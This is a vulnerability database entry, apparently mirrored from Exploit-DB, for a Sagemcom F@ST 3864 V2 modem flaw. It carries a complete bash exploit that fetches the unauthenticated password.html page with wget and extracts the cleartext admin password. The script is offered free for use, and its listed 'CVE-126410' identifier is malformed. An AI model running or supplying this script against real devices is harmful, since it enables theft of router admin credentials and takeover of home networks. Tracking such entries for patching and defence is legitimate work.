ID
VAR-E-201508-0383
EDB ID
37801
TITLE
Sagemcom F@ST 3864 V2 - Get Admin Password - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Sagemcom F@ST 3864 V2 - Get Admin Password. CVE-126410 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | sagemcom | model: | f@st | scope: | eq | version: | 3864v2 | Trust: 1.0 |
| vendor: | sagemcom | model: | [email protected] | scope: | eq | version: | 3864v2 | Trust: 0.6 |
EXPLOIT
#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################
# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
if [ "$1" != "" ]
then
IP_ADDRESS="$1"
else
echo "Usage : $0 IP_ADDRESS"
exit 1
fi
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O - | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"
Trust: 1.0
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Get Admin Password
Trust: 1.6
CREDITS
Cade Bull
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 37801 | Trust: 1.6 |
| db: | EDBNET | id: | 58966 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/37801/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 37801 |
| db: | EDBNET | id: | 58966 |
LAST UPDATE DATE
2022-07-27T10:03:04.826000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 37801 | date: | 2015-08-17T00:00:00 |
| db: | EDBNET | id: | 58966 | date: | 2015-08-17T00:00:00 |